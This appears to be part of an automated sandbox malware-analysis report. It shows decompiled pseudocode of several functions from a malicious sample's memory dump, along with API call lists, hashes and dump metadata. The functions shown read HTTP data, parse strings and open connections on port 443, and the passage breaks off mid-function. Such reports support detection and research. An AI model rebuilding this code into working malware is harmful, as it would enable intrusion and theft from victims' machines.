                                                                                                                          									_t99 = _v12;
                                                                                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                                                                                          									if(_t99 == 0) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									_v12 = _v12 + 1;
                                                                                                                          									if(_v12 < _a4) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									goto L30;
                                                                                                                          								}
                                                                                                                          								_v8 = _v8 - 1;
                                                                                                                          								L30:
                                                                                                                          								_t97 = _a4;
                                                                                                                          								_a4 = _a4 + 1;
                                                                                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                                                                                          								__imp__(_t124);
                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                          								_t124 = _t124 + _t97 + 1;
                                                                                                                          							} while (_v8 < _a8);
                                                                                                                          							goto L31;
                                                                                                                          						}
                                                                                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                                                                                          						_t101 = _t83;
                                                                                                                          						if(_t83 - 0x61 <= 0x19) {
                                                                                                                          							_t101 = _t101 - 0x20;
                                                                                                                          						}
                                                                                                                          						 *_t107 = _t101;
                                                                                                                          						_t113 = _t113 + 1;
                                                                                                                          						goto L10;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				if(_t118 != 0) {
                                                                                                                          					if(_t118 > _v8) {
                                                                                                                          						_v8 = _t118;
                                                                                                                          					}
                                                                                                                          					_a8 = _a8 + 1;
                                                                                                                          				}
                                                                                                                          				goto L21;
                                                                                                                          			}






















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04CD79E3
                                                                                                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 04CD79F8
                                                                                                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04CD7A0F
                                                                                                                          • lstrlen.KERNEL32(69B25F45), ref: 04CD7A33
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3214092121-3916222277
                                                                                                                          • Opcode ID: 2e23922216b9dae6cd2419e2777f35fc2c74473d3e1b735eff3a77df9c0ddfd6
                                                                                                                          • Instruction ID: 2697409b36f9c3dfb4531dc92490ba8f7ab95cce6b2279836e0ef319287cebab
                                                                                                                          • Opcode Fuzzy Hash: 2e23922216b9dae6cd2419e2777f35fc2c74473d3e1b735eff3a77df9c0ddfd6
                                                                                                                          • Instruction Fuzzy Hash: B451AE36A02218EBDF11DF99C584BADBBB7FF45314F05906AEA19AB205C770BB51CB40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 62%
                                                                                                                          			E04CD4F07(void* __eax) {
                                                                                                                          				long _v8;
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t41;
                                                                                                                          				char* _t42;
                                                                                                                          				long _t43;
                                                                                                                          				void* _t46;
                                                                                                                          				intOrPtr _t47;
                                                                                                                          				intOrPtr* _t48;
                                                                                                                          				char _t50;
                                                                                                                          				long _t54;
                                                                                                                          				char* _t55;
                                                                                                                          				long _t56;
                                                                                                                          				intOrPtr* _t57;
                                                                                                                          				void* _t60;
                                                                                                                          				void* _t61;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t73;
                                                                                                                          				void* _t74;
                                                                                                                          				void* _t78;
                                                                                                                          
                                                                                                                          				_t72 = __eax;
                                                                                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                                                                                          					L2:
                                                                                                                          					_t41 = _t72;
                                                                                                                          					_pop(_t73);
                                                                                                                          					_t74 = _t41;
                                                                                                                          					_t42 =  &_v12;
                                                                                                                          					_v8 = 0;
                                                                                                                          					_v16 = 0;
                                                                                                                          					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
                                                                                                                          					if(_t42 == 0) {
                                                                                                                          						_t43 = GetLastError();
                                                                                                                          						_v8 = _t43;
                                                                                                                          						if(_t43 == 0x2efe) {
                                                                                                                          							_v8 = 0;
                                                                                                                          							goto L29;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						if(_v12 == 0) {
                                                                                                                          							L29:
                                                                                                                          							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                                                                                                          						} else {
                                                                                                                          							_t46 =  *0x4cdd130(0, 1,  &_v24); // executed
                                                                                                                          							if(_t46 != 0) {
                                                                                                                          								_v8 = 8;
                                                                                                                          							} else {
                                                                                                                          								_t47 = E04CD75F6(0x1000);
                                                                                                                          								_v20 = _t47;
                                                                                                                          								if(_t47 == 0) {
                                                                                                                          									_v8 = 8;
                                                                                                                          								} else {
                                                                                                                          									goto L8;
                                                                                                                          									do {
                                                                                                                          										while(1) {
                                                                                                                          											L8:
                                                                                                                          											_t50 = _v12;
                                                                                                                          											if(_t50 >= 0x1000) {
                                                                                                                          												_t50 = 0x1000;
                                                                                                                          											}
                                                                                                                          											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                                                                                                                          											if(_t50 == 0) {
                                                                                                                          												break;
                                                                                                                          											}
                                                                                                                          											_t57 = _v24;
                                                                                                                          											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                                                                                                                          											_t18 =  &_v12;
                                                                                                                          											 *_t18 = _v12 - _v16;
                                                                                                                          											if( *_t18 != 0) {
                                                                                                                          												continue;
                                                                                                                          											} else {
                                                                                                                          											}
                                                                                                                          											L14:
                                                                                                                          											if(WaitForSingleObject( *0x4cdd2a4, 0) != 0x102) {
                                                                                                                          												_v8 = 0x102;
                                                                                                                          											} else {
                                                                                                                          												_t55 =  &_v12;
                                                                                                                          												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
                                                                                                                          												if(_t55 != 0) {
                                                                                                                          													goto L19;
                                                                                                                          												} else {
                                                                                                                          													_t56 = GetLastError();
                                                                                                                          													_v8 = _t56;
                                                                                                                          													if(_t56 == 0x2f78 && _v12 == 0) {
                                                                                                                          														_v8 = 0;
                                                                                                                          														goto L19;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L22:
                                                                                                                          											E04CD4AAB(_v20);
                                                                                                                          											if(_v8 == 0) {
                                                                                                                          												_t54 = E04CD3B3F(_v24, _t74); // executed
                                                                                                                          												_v8 = _t54;
                                                                                                                          											}
                                                                                                                          											goto L25;
                                                                                                                          										}
                                                                                                                          										_v8 = GetLastError();
                                                                                                                          										goto L14;
                                                                                                                          										L19:
                                                                                                                          									} while (_v12 != 0);
                                                                                                                          									goto L22;
                                                                                                                          								}
                                                                                                                          								L25:
                                                                                                                          								_t48 = _v24;
                                                                                                                          								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _v8;
                                                                                                                          				} else {
                                                                                                                          					_t60 = E04CD121A(__eax); // executed
                                                                                                                          					if(_t60 != 0) {
                                                                                                                          						return _t60;
                                                                                                                          					} else {
                                                                                                                          						goto L2;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}




























                                                                                                                          APIs
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 04CD76AF
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD76CF
                                                                                                                            • Part of subcall function 04CD121A: wcstombs.NTDLL ref: 04CD12DC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2344289193-0
                                                                                                                          • Opcode ID: 84d34e5da260f623c26dd80c385cc43435bea72fec4e1fffaaff85124c57aa38
                                                                                                                          • Instruction ID: 865a21448199ee696c3ef8053f416ef27529161a234ddf8b8398583b1fc04235
                                                                                                                          • Opcode Fuzzy Hash: 84d34e5da260f623c26dd80c385cc43435bea72fec4e1fffaaff85124c57aa38
                                                                                                                          • Instruction Fuzzy Hash: 0D414F74D02219EFDF11AFA9C984AAEBBBAFF04344F144869E602E3110E734AE41DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(80000002), ref: 04CD3DFD
                                                                                                                          • SysAllocString.OLEAUT32(04CD28D9), ref: 04CD3E41
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD3E55
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD3E63
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 344208780-0
                                                                                                                          • Opcode ID: c278062c9d8eac3a5da27d894e3ebeabe4289d4952fcc77b18187c5960312da0
                                                                                                                          • Instruction ID: f7f94b093bb63511ffe7da27aa5ed6395ed3e4d6250fc17570a412759003bdea
                                                                                                                          • Opcode Fuzzy Hash: c278062c9d8eac3a5da27d894e3ebeabe4289d4952fcc77b18187c5960312da0
                                                                                                                          • Instruction Fuzzy Hash: 96311276900249EFCB05DF98D8C49AE7BB5FF48340B14842EFA069B290D774EA41CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 50%
                                                                                                                          			E04CD9311(void** __esi) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				intOrPtr _t4;
                                                                                                                          				intOrPtr _t6;
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t9;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				void* _t11;
                                                                                                                          				void** _t13;
                                                                                                                          
                                                                                                                          				_t13 = __esi;
                                                                                                                          				_t4 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          				__imp__(_t4 + 0x40);
                                                                                                                          				while(1) {
                                                                                                                          					_t6 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          					_t1 = _t6 + 0x58; // 0x0
                                                                                                                          					if( *_t1 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					Sleep(0xa);
                                                                                                                          				}
                                                                                                                          				_t8 =  *_t13;
                                                                                                                          				if(_t8 != 0 && _t8 != 0x4cdd030) {
                                                                                                                          					HeapFree( *0x4cdd270, 0, _t8);
                                                                                                                          				}
                                                                                                                          				_t9 = E04CD5141(_v0, _t13); // executed
                                                                                                                          				_t13[1] = _t9;
                                                                                                                          				_t10 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          				_t11 = _t10 + 0x40;
                                                                                                                          				__imp__(_t11);
                                                                                                                          				return _t11;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(058B9570), ref: 04CD931A
                                                                                                                          • Sleep.KERNEL32(0000000A,?,04CD5390), ref: 04CD9324
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,04CD5390), ref: 04CD934C
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(058B9570), ref: 04CD9368
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 58946197-0
                                                                                                                          • Opcode ID: d2be6cd4ea3b35bd94c0323e9bae8fe03baaeac45efdd6e3d4cd4b6c17a4f4ca
                                                                                                                          • Instruction ID: 6e56d7cd242e435d1f4e4e620ab4eda6db3ddc26be087f63232c77beffea56a3
                                                                                                                          • Opcode Fuzzy Hash: d2be6cd4ea3b35bd94c0323e9bae8fe03baaeac45efdd6e3d4cd4b6c17a4f4ca
                                                                                                                          • Instruction Fuzzy Hash: 72F012B9A06240ABE7249F65DD48F1A7BB9FF15344B044418F643D71A0C638FD40DB15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 18%
                                                                                                                          			E04CD121A(void* __esi) {
                                                                                                                          				signed int _v8;
                                                                                                                          				long _v12;
                                                                                                                          				char _v16;
                                                                                                                          				long* _v20;
                                                                                                                          				long _t36;
                                                                                                                          				long* _t47;
                                                                                                                          				intOrPtr* _t63;
                                                                                                                          				intOrPtr* _t64;
                                                                                                                          				char* _t65;
                                                                                                                          
                                                                                                                          				_t36 =  *((intOrPtr*)(__esi + 0x28));
                                                                                                                          				_t63 = __esi + 0x2c;
                                                                                                                          				_v16 = 0;
                                                                                                                          				 *_t63 = 0;
                                                                                                                          				_v12 = _t36;
                                                                                                                          				if(_t36 != 0) {
                                                                                                                          					L12:
                                                                                                                          					return _v12;
                                                                                                                          				}
                                                                                                                          				_v8 = 4;
                                                                                                                          				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                                                                                                                          				if(_t36 == 0) {
                                                                                                                          					L11:
                                                                                                                          					_v12 = GetLastError();
                                                                                                                          					goto L12;
                                                                                                                          				}
                                                                                                                          				_push( &_v16);
                                                                                                                          				_push( &_v8);
                                                                                                                          				_push(_t63);
                                                                                                                          				_t64 = __imp__; // 0x6f5efd20
                                                                                                                          				_push(0);
                                                                                                                          				_push(0x20000013);
                                                                                                                          				_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                          				if( *_t64() == 0) {
                                                                                                                          					goto L11;
                                                                                                                          				} else {
                                                                                                                          					_v16 = 0;
                                                                                                                          					_v8 = 0;
                                                                                                                          					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                                                                                                                          					_t47 = E04CD75F6(_v8 + 2);
                                                                                                                          					_v20 = _t47;
                                                                                                                          					if(_t47 == 0) {
                                                                                                                          						_v12 = 8;
                                                                                                                          					} else {
                                                                                                                          						_push( &_v16);
                                                                                                                          						_push( &_v8);
                                                                                                                          						_push(_t47);
                                                                                                                          						_push(0);
                                                                                                                          						_push(0x16);
                                                                                                                          						_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                          						if( *_t64() == 0) {
                                                                                                                          							_v12 = GetLastError();
                                                                                                                          						} else {
                                                                                                                          							_v8 = _v8 >> 1;
                                                                                                                          							 *((short*)(_v20 + _v8 * 2)) = 0;
                                                                                                                          							_t65 = E04CD75F6(_v8 + 1);
                                                                                                                          							if(_t65 == 0) {
                                                                                                                          								_v12 = 8;
                                                                                                                          							} else {
                                                                                                                          								wcstombs(_t65, _v20, _v8 + 1);
                                                                                                                          								 *(__esi + 0xc) = _t65;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						E04CD4AAB(_v20);
                                                                                                                          					}
                                                                                                                          					goto L12;
                                                                                                                          				}
                                                                                                                          			}












                                                                                                                          0x04cd129d

                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD130E
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • wcstombs.NTDLL ref: 04CD12DC
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD12F2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2631933831-0
                                                                                                                          • Opcode ID: 57f8b5dac1b9b8eeee96b12cf391ac3147929046010e36435f0d176f6713c15c
                                                                                                                          • Instruction ID: 052228ccdff3f42aa41e54c967e7c68559fab7022990ded8158a9bef1569be89
                                                                                                                          • Opcode Fuzzy Hash: 57f8b5dac1b9b8eeee96b12cf391ac3147929046010e36435f0d176f6713c15c
                                                                                                                          • Instruction Fuzzy Hash: 74311CB5900208EFDB10DFA5CD80EAEB7F9FF48344F144569E642E3250EB31AA44DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD502E(void* __edx) {
                                                                                                                          				void* _v8;
                                                                                                                          				int _v12;
                                                                                                                          				WCHAR* _v16;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t23;
                                                                                                                          				intOrPtr _t24;
                                                                                                                          				void* _t26;
                                                                                                                          				intOrPtr _t32;
                                                                                                                          				intOrPtr _t35;
                                                                                                                          				void* _t37;
                                                                                                                          				intOrPtr _t38;
                                                                                                                          				intOrPtr _t42;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t50;
                                                                                                                          				void* _t52;
                                                                                                                          
                                                                                                                          				_t50 = __edx;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_t23 = E04CD37AC(0,  &_v8); // executed
                                                                                                                          				if(_t23 != 0) {
                                                                                                                          					_v8 = 0;
                                                                                                                          				}
                                                                                                                          				_t24 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          				_t4 = _t24 + 0x4cdedc8; // 0x58b9370
                                                                                                                          				_t5 = _t24 + 0x4cded70; // 0x4f0053
                                                                                                                          				_t26 = E04CD4B28( &_v16, _v8, _t5, _t4); // executed
                                                                                                                          				_t45 = _t26;
                                                                                                                          				if(_t45 == 0) {
                                                                                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                          					_t45 = 8;
                                                                                                                          					if(_v12 < _t45) {
                                                                                                                          						_t45 = 1;
                                                                                                                          						__eflags = 1;
                                                                                                                          					} else {
                                                                                                                          						_t32 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          						_t11 = _t32 + 0x4cdedbc; // 0x58b9364
                                                                                                                          						_t48 = _t11;
                                                                                                                          						_t12 = _t32 + 0x4cded70; // 0x4f0053
                                                                                                                          						_t52 = E04CD131E(_t11, _t12, _t11);
                                                                                                                          						_t59 = _t52;
                                                                                                                          						if(_t52 != 0) {
                                                                                                                          							_t35 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          							_t13 = _t35 + 0x4cdee06; // 0x30314549
                                                                                                                          							_t37 = E04CD117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                                                                                          							if(_t37 == 0) {
                                                                                                                          								_t61 =  *0x4cdd294 - 6;
                                                                                                                          								if( *0x4cdd294 <= 6) {
                                                                                                                          									_t42 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          									_t15 = _t42 + 0x4cdec12; // 0x52384549
                                                                                                                          									E04CD117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t38 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          							_t17 = _t38 + 0x4cdee00; // 0x58b93a8
                                                                                                                          							_t18 = _t38 + 0x4cdedd8; // 0x680043
                                                                                                                          							_t45 = E04CD5DDA(_v8, 0x80000001, _t52, _t18, _t17);
                                                                                                                          							HeapFree( *0x4cdd270, 0, _t52);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					HeapFree( *0x4cdd270, 0, _v16);
                                                                                                                          				}
                                                                                                                          				_t54 = _v8;
                                                                                                                          				if(_v8 != 0) {
                                                                                                                          					E04CD51BB(_t54);
                                                                                                                          				}
                                                                                                                          				return _t45;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,058B9370,00000000,?,73BCF710,00000000,73BCF730), ref: 04CD507D
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058B93A8,?,00000000,30314549,00000014,004F0053,058B9364), ref: 04CD511A
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04CD54EF), ref: 04CD512C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: d3c38f435c3fd170a46e0546bb3e3db83428b2ce134544877871a147237f7274
                                                                                                                          • Instruction ID: b132c186c95293e424241b43841537c537e5d535696318b179eaa63e1c4b7e41
                                                                                                                          • Opcode Fuzzy Hash: d3c38f435c3fd170a46e0546bb3e3db83428b2ce134544877871a147237f7274
                                                                                                                          • Instruction Fuzzy Hash: A7319179A40509BFEB21EF90DD88EAA7BBEFB08704F144166A7029B150D671FE05DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 47%
                                                                                                                          			E04CD5141(char* _a4, char** _a8) {
                                                                                                                          				char* _t7;
                                                                                                                          				char* _t11;
                                                                                                                          				char* _t14;
                                                                                                                          				char* _t16;
                                                                                                                          				char* _t17;
                                                                                                                          				char _t18;
                                                                                                                          				signed int _t20;
                                                                                                                          				signed int _t22;
                                                                                                                          
                                                                                                                          				_t16 = _a4;
                                                                                                                          				_push(0x20);
                                                                                                                          				_t20 = 1;
                                                                                                                          				_push(_t16);
                                                                                                                          				while(1) {
                                                                                                                          					_t7 = StrChrA();
                                                                                                                          					if(_t7 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t20 = _t20 + 1;
                                                                                                                          					_push(0x20);
                                                                                                                          					_push( &(_t7[1]));
                                                                                                                          				}
                                                                                                                          				_t11 = E04CD75F6(_t20 << 2);
                                                                                                                          				_a4 = _t11;
                                                                                                                          				if(_t11 != 0) {
                                                                                                                          					StrTrimA(_t16, 0x4cdc2a4); // executed
                                                                                                                          					_t22 = 0;
                                                                                                                          					do {
                                                                                                                          						_t14 = StrChrA(_t16, 0x20);
                                                                                                                          						if(_t14 != 0) {
                                                                                                                          							 *_t14 = 0;
                                                                                                                          							do {
                                                                                                                          								_t14 =  &(_t14[1]);
                                                                                                                          								_t18 =  *_t14;
                                                                                                                          							} while (_t18 == 0x20 || _t18 == 9);
                                                                                                                          						}
                                                                                                                          						_t17 = _a4;
                                                                                                                          						 *(_t17 + _t22 * 4) = _t16;
                                                                                                                          						_t22 = _t22 + 1;
                                                                                                                          						_t16 = _t14;
                                                                                                                          					} while (_t14 != 0);
                                                                                                                          					 *_a8 = _t17;
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • StrChrA.SHLWAPI(?,00000020,00000000,058B95AC,04CD5390,?,04CD935C,?,058B95AC,?,04CD5390), ref: 04CD515D
                                                                                                                          • StrTrimA.SHLWAPI(?,04CDC2A4,00000002,?,04CD935C,?,058B95AC,?,04CD5390), ref: 04CD517B
                                                                                                                          • StrChrA.SHLWAPI(?,00000020,?,04CD935C,?,058B95AC,?,04CD5390), ref: 04CD5186
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Trim
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3043112668-0
                                                                                                                          • Opcode ID: 6360d9005dbc542d6bd2da649fdede735b436c014eef832e779df029e1d426f0
                                                                                                                          • Instruction ID: fddcbd8c12c345b5875e9ac790e74da47e7fc2e3b797443b2663f817a466b4b6
                                                                                                                          • Opcode Fuzzy Hash: 6360d9005dbc542d6bd2da649fdede735b436c014eef832e779df029e1d426f0
                                                                                                                          • Instruction Fuzzy Hash: 0C01B1797003467FE7204E2A8C44F67BF9FEB8A348F041011BB55CB282E670E901C760
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 23%
                                                                                                                          			E04CD7749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				char _v12;
                                                                                                                          				signed int _t34;
                                                                                                                          				long _t36;
                                                                                                                          				unsigned int _t37;
                                                                                                                          				signed int _t38;
                                                                                                                          				intOrPtr _t39;
                                                                                                                          				signed int _t40;
                                                                                                                          				intOrPtr _t42;
                                                                                                                          				intOrPtr _t43;
                                                                                                                          				intOrPtr _t45;
                                                                                                                          				void* _t56;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				void* _t63;
                                                                                                                          				intOrPtr* _t65;
                                                                                                                          				intOrPtr* _t66;
                                                                                                                          				void* _t69;
                                                                                                                          
                                                                                                                          				_t66 = __esi;
                                                                                                                          				_t63 = E04CD1922(_t34, _a4);
                                                                                                                          				if(_t63 == 0) {
                                                                                                                          					L18:
                                                                                                                          					_t36 = GetLastError();
                                                                                                                          				} else {
                                                                                                                          					_t37 = GetVersion();
                                                                                                                          					_t69 = _t37 - 6;
                                                                                                                          					if(_t69 > 0) {
                                                                                                                          						L5:
                                                                                                                          						_a4 = 4;
                                                                                                                          					} else {
                                                                                                                          						if(_t69 != 0) {
                                                                                                                          							L4:
                                                                                                                          							_a4 = 0;
                                                                                                                          						} else {
                                                                                                                          							_t37 = _t37 >> 8;
                                                                                                                          							if(_t37 > 2) {
                                                                                                                          								goto L5;
                                                                                                                          							} else {
                                                                                                                          								goto L4;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					__imp__(_t63, _a4, 0, 0, 0); // executed
                                                                                                                          					 *(_t66 + 0x10) = _t37;
                                                                                                                          					_t38 = E04CD4AAB(_t63);
                                                                                                                          					if( *(_t66 + 0x10) == 0) {
                                                                                                                          						goto L18;
                                                                                                                          					} else {
                                                                                                                          						_t39 = E04CD1922(_t38,  *_t66);
                                                                                                                          						_v8 = _t39;
                                                                                                                          						if(_t39 == 0) {
                                                                                                                          							goto L18;
                                                                                                                          						} else {
                                                                                                                          							_t65 = __imp__; // 0x6f5ef5a0
                                                                                                                          							if(_a8 == 0) {
                                                                                                                          								L10:
                                                                                                                          								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                                                                                                                          								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                                                                                                                          								_t40 = E04CD4AAB(_v8);
                                                                                                                          								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
